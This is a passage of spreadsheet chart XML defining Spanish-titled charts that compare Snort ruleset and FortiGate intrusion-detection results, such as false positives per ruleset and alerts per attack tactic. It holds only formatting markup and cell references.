            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$O$10:$O$22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sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>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PORCENTAJES TÁCTICAS ANALIZADAS (ATAQUES)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:pieChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$V$8:$V$9</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Lbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$Q$10:$Q$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$V$10:$V$22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000000"/>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DE FP POR RULESET</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:lineChart>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:ln cmpd="sng" w="19050">
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="14"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:dPt>
            <c:idx val="2"/>
            <c:marker>
              <c:symbol val="none"/>
            </c:marker>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="1" sz="1600">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:trendline>
            <c:name/>
            <c:spPr>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
            <c:trendlineType val="linear"/>
            <c:dispRSqr val="0"/>
            <c:dispEq val="0"/>
          </c:trendline>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$Y$31:$AB$31</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$Y$49:$AB$49</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="687428137"/>
        <c:axId val="205050506"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="6874281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5050506"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="205050506"/>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87428137"/>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EFECTIVIDAD ALERTAS POR TÁCTICA</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="bar"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent4"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="0"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="2"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="3"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="4"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="5"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="6"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="7"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="8"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="9"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="10"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="11"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="12"/>
          </c:dPt>
          <c:dLbls>
            <c:dLbl>
              <c:idx val="0"/>
              <c:layout>
                <c:manualLayout>
                  <c:xMode val="edge"/>
                  <c:yMode val="edge"/>
                  <c:x val="0.8906132090947865"/>
                  <c:y val="0.03177781810672291"/>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dLbl>
              <c:idx val="5"/>
              <c:layout>
                <c:manualLayout>
                  <c:xMode val="edge"/>
                  <c:yMode val="edge"/>
                  <c:x val="0.8733800565647512"/>
                  <c:y val="0.41132108237326115"/>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dLbl>
              <c:idx val="9"/>
              <c:layout>
                <c:manualLayout>
                  <c:xMode val="edge"/>
                  <c:yMode val="edge"/>
                  <c:x val="0.8343703180464331"/>
                  <c:y val="0.7104936262883534"/>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Resultados II - Snort'!$X$32:$X$44</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$AE$32:$AE$44</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="311145672"/>
        <c:axId val="977475588"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="31114567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77475588"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="97747558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11145672"/>
        <c:crosses val="max"/>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Nº TÉCNICAS QUE GENERAN ALERTAS TÁCTICA/RS</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:lineChart>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$K$8:$K$9</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$K$10:$K$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$L$8:$L$9</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$L$10:$L$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$M$8:$M$9</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FBBC04"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$M$10:$M$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$N$8:$N$9</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="34A853"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$N$10:$N$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="1416765975"/>
        <c:axId val="180935157"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="14167659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rot="-3600000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="180935157"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1809351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16765975"/>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Nº ATAQUES QUE GENERAN ALERTAS TÁCTICA/RS</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:lineChart>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$R$8:$R$9</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="19050">
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$Q$10:$Q$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$R$10:$R$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$S$8:$S$9</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="19050">
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$Q$10:$Q$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$S$10:$S$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$T$8:$T$9</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="19050">
              <a:solidFill>
                <a:srgbClr val="FBBC04"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$Q$10:$Q$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$T$10:$T$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$U$8:$U$9</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="19050">
              <a:solidFill>
                <a:srgbClr val="34A853"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$Q$10:$Q$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$U$10:$U$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="1149016455"/>
        <c:axId val="2070367577"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="11490164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3600000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="2070367577"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="20703675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49016455"/>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Nº TÉCNICAS QUE GENERAN ALERTAS TÁCTICA/RS</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:areaChart>
        <c:grouping val="stacked"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$K$8:$K$9</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4285F4">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$K$10:$K$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$L$8:$L$9</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="EA4335">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$L$10:$L$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$M$8:$M$9</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FBBC04">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FBBC04"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$M$10:$M$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$N$8:$N$9</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="34A853">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="34A853"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$N$10:$N$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="981568967"/>
        <c:axId val="1466093205"/>
      </c:areaChart>
      <c:catAx>
        <c:axId val="9815689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rot="-3600000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1466093205"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="14660932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81568967"/>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Nº ATAQUES QUE GENERAN ALERTAS TÁCTICA/RS</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:areaChart>
        <c:grouping val="stacked"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$R$8:$R$9</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4285F4">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln cmpd="sng" w="19050">
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$Q$10:$Q$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$R$10:$R$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$S$8:$S$9</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="EA4335">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln cmpd="sng" w="19050">
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$Q$10:$Q$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$S$10:$S$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$T$8:$T$9</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FBBC04">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln cmpd="sng" w="19050">
              <a:solidFill>
                <a:srgbClr val="FBBC04"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$Q$10:$Q$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$T$10:$T$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$U$8:$U$9</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="34A853">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln cmpd="sng" w="19050">
              <a:solidFill>
                <a:srgbClr val="34A853"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$Q$10:$Q$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$U$10:$U$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1954953945"/>
        <c:axId val="1349329395"/>
      </c:areaChart>
      <c:catAx>
        <c:axId val="19549539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3600000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1349329395"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="13493293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54953945"/>
      </c:valAx>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PORCENTAJE TÉCNICAS CON ALERTA</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:lineChart>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:trendline>
            <c:name/>
            <c:spPr>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
            <c:trendlineType val="linear"/>
            <c:dispRSqr val="1"/>
            <c:dispEq val="1"/>
          </c:trendline>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$K$27:$N$27</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="965088845"/>
        <c:axId val="1929946823"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="9650888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29946823"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="19299468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TÉCNICAS CON ALERTA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65088845"/>
      </c:valAx>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PORCENTAJE ATAQUES CON ALERTA</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:lineChart>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:trendline>
            <c:name/>
            <c:spPr>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
            <c:trendlineType val="linear"/>
            <c:dispRSqr val="1"/>
            <c:dispEq val="1"/>
          </c:trendline>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$R$27:$U$27</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="672669469"/>
        <c:axId val="1705858537"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="6726694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05858537"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="17058585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CON ALERTA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72669469"/>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PARA RS2</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Snort'!$L$27:$L$28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INSTANCIAS DE ATAQUES DETECTADAS POR SNORT</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cat>
            <c:strRef>
              <c:f>'(D) - Resultados I'!$H$144:$H$145</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados I'!$H$144:$H$145</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INSTANCIAS DE ATAQUE DETECTADAS POR FORTIGATE</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cat>
            <c:strRef>
              <c:f>'(D) - Resultados I'!$P$140:$P$141</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados I'!$P$144:$P$145</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DETECCIÓN - TÁCTICAS (BASADO EN INSTANCIAS)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados I'!$AD$11</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados I'!$T$12:$T$24</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados I'!$AD$12:$AD$24</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados I'!$AF$11</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados I'!$T$12:$T$24</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados I'!$AF$12:$AF$24</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="390409700"/>
        <c:axId val="25899947"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="3904097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5899947"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2589994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Nº DE INSTANCIAS DE ATAQUE PRINCIPAL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90409700"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="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SNORT (RS4)</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cat>
            <c:strRef>
              <c:f>'(D) - Resultados I'!$H$144:$H$145</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados I'!$H$149:$H$150</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FORTIGATE</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cat>
            <c:strRef>
              <c:f>'(D) - Resultados I'!$P$140:$P$141</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados I'!$P$149:$P$150</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DETECCIÓN - TÁCTICAS (BASADO EN ATAQUES)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados I'!$AD$36</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados I'!$T$12:$T$24</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados I'!$AD$37:$AD$49</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados I'!$AE$36</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados I'!$T$12:$T$24</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados I'!$AE$37:$AE$49</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1618113958"/>
        <c:axId val="1019876265"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="16181139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19876265"/>
      </c:catAx>
      <c:valAx>
